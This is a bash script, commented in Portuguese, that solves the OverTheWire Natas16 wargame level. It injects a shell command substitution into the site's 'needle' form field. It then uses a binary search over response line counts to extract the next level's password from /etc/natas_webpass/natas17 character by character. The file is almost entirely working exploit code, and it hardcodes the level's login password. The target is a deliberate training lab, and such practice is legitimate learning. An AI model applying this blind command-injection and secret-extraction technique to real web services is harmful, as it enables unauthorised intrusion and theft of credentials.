#!/bin/bash

# comente para desabilitar
DEBUG_FILE=''

CUR_USER="natas16"
CUR_PASSWORD="WaIHEacj63wnNIBROHeqi3p9t0m5nhmh"
CUR_SITE="http://natas16.natas.labs.overthewire.org"
FILE="/etc/natas_webpass/natas17"

# IMPORTANTE: essa funcao nao deve imprimir nada em stdout que nao seja
# o caractere da senha
bin_search()
{
	if [[ "$#" -ne 4 ]] ; then return 255 ; fi
	def_lines="$1"
	str="$2"
	min="$3"
	max="$4"

	if [[ "$DEBUG_FILE" ]] ; then
		echo "min=$min max=$max" >> "$DEBUG_FILE"
	fi

	cur_lines="$(curl -u $CUR_USER:$CUR_PASSWORD \
		--data needle="\$(grep -E ^$str[$min-$max] $FILE)" \
		$CUR_SITE 2>/dev/null | wc -l)"
	if [[ "$cur_lines" == "$def_lines" ]] ; then return ; fi

	if [[ "$max" != "$min" ]] ; then
		max_ascii=$(printf "%d" "'$max'")
		min_ascii=$(printf "%d" "'$min'")
		mid_ascii=$(( (max_ascii + min_ascii) / 2 ))
		upper_mid="$(python -c "print chr("$((mid_ascii + 1))")")"
		lower_mid="$(python -c "print chr("$((mid_ascii))")")"

		if [[ "$DEBUG_FILE" ]] ; then
			echo "mid_ascii=$mid_ascii lower_mid=$lower_mid upper_mid=$upper_mid" >> "$DEBUG_FILE"
		fi

		res1="$(bin_search "$def_lines" "$str" "$min" "$lower_mid")"
		if [[ "$res1" ]] ; then echo "$res1" && return ; fi

		res2="$(bin_search "$def_lines" "$str" "$upper_mid" "$max")"
		if [[ "$res2" ]] ; then echo "$res2" && return ; fi
	fi

	# aqui, min == max
	echo "$min"
}

main()
{
	if [[ "$DEBUG_FILE" ]] ; then rm "$DEBUG_FILE" 2>/dev/null ; fi

	def_lines="$(curl -u $CUR_USER:$CUR_PASSWORD --data needle="." \
		$CUR_SITE 2>/dev/null | wc -l)"
	(( def_lines += 1 )) # o output anterior tem uma linha a menos...

	if [[ "$DEBUG_FILE" ]] ; then
		echo def_lines=$def_lines >> "$DEBUG_FILE"
	fi

	str=''
	min_values=(a A 0)
	max_values=(z Z 9)
	while [[ "true" ]] ; do
		max=''
		min=''

		# testa os tres intervalos
		char=''
		for (( i = 0 ; i < ${#min_values[@]} ; i++ )) ; do
			min="${min_values[i]}"
			max="${max_values[i]}"
			char="$(bin_search "$def_lines" "$str" "$min" "$max")"

			if [[ "$char" ]] ; then
				str+="$char"
				break
			fi
		done
		if [[ "$DEBUG_FILE" ]] ; then
			echo str="$str" >> "$DEBUG_FILE"
		fi

		if [[ ! "$char" ]] ; then break ; fi
	done

	echo "$str"
}

main
